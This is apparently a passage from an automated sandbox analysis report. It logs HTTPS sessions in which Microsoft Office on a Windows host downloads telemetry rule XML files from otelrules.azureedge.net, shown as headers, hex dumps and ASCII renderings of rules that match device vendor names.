                  2024-10-23 04:48:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                  Session IDSource IPSource PortDestination IPDestination Port
                  30192.168.2.44977713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:05 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:05 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:05 GMT
                  Content-Type: text/xml
                  Content-Length: 472
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                  ETag: "0x8DC582B9DACDF62"
                  x-ms-request-id: fc96bee5-501e-00a3-3f0b-22c0f2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044805Z-16849878b78bkvbz1ry47zvsas00000005qg00000000ds1a
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  31192.168.2.44977813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:05 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:05 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:05 GMT
                  Content-Type: text/xml
                  Content-Length: 404
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                  ETag: "0x8DC582B9E8EE0F3"
                  x-ms-request-id: 9956b93e-101e-0017-0e1a-2447c7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044805Z-r197bdfb6b4sn8wg20e97vn7ps0000000kw000000000p5fr
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:05 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                  Session IDSource IPSource PortDestination IPDestination Port
                  32192.168.2.44977913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:05 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:05 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:05 GMT
                  Content-Type: text/xml
                  Content-Length: 468
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                  ETag: "0x8DC582B9C8E04C8"
                  x-ms-request-id: b38717f8-301e-0020-78f3-246299000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044805Z-15b8d89586flspj6y6m5fk442w00000002u0000000003tq1
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  33192.168.2.44978013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:05 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:05 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:05 GMT
                  Content-Type: text/xml
                  Content-Length: 428
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                  ETag: "0x8DC582BAC4F34CA"
                  x-ms-request-id: b11d926e-c01e-00a2-50f4-242327000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044805Z-r197bdfb6b4r9fwfyb63s04k3n00000006tg0000000027n3
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:05 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                  Session IDSource IPSource PortDestination IPDestination Port
                  34192.168.2.44978313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:06 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:06 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:06 GMT
                  Content-Type: text/xml
                  Content-Length: 471
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                  ETag: "0x8DC582BB5815C4C"
                  x-ms-request-id: 9b0fb70e-e01e-0020-42f5-24de90000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044806Z-r197bdfb6b49k6rsrbz098tg8000000002sg00000000n3cy
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:06 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  35192.168.2.44978113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:06 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:06 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:06 GMT
                  Content-Type: text/xml
                  Content-Length: 499
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                  ETag: "0x8DC582B98CEC9F6"
                  x-ms-request-id: 6ff76e76-001e-002b-21c5-2099f2000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044806Z-16849878b78p6ttkmyustyrk8s00000005g000000000nbn2
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:06 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  36192.168.2.44978513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:06 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:06 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:06 GMT
                  Content-Type: text/xml
                  Content-Length: 494
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                  ETag: "0x8DC582BB8972972"
                  x-ms-request-id: 131e52ce-d01e-002b-553b-2225fb000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044806Z-16849878b78bkvbz1ry47zvsas00000005s0000000009g7t
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:06 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  37192.168.2.44978413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:06 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:06 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:06 GMT
                  Content-Type: text/xml
                  Content-Length: 419
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                  ETag: "0x8DC582BB32BB5CB"
                  x-ms-request-id: 26284338-e01e-0052-664d-22d9df000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044806Z-16849878b78gvgmlcfru6nuc5400000005s0000000003bxa
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                  Session IDSource IPSource PortDestination IPDestination Port
                  38192.168.2.44978213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:06 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:06 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:06 GMT
                  Content-Type: text/xml
                  Content-Length: 415
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                  ETag: "0x8DC582B988EBD12"
                  x-ms-request-id: 3cf1b782-701e-0001-32e5-21b110000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044806Z-16849878b78dghrpt8v731n7r400000005pg000000003nza
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:06 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                  Session IDSource IPSource PortDestination IPDestination Port
                  39192.168.2.44978713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:07 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:07 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:07 GMT
                  Content-Type: text/xml
                  Content-Length: 472
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                  ETag: "0x8DC582B9D43097E"
                  x-ms-request-id: d2baa5f3-801e-0078-3ff3-24bac6000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044807Z-r197bdfb6b46gt25anfa5gg2fw000000014g00000000msfe
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  40192.168.2.44978613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:07 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:07 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:07 GMT
                  Content-Type: text/xml
                  Content-Length: 420
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                  ETag: "0x8DC582B9DAE3EC0"
                  x-ms-request-id: 5fd7cbed-901e-0048-7ef3-24b800000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044807Z-r197bdfb6b46gt25anfa5gg2fw000000017000000000at2y
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:07 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
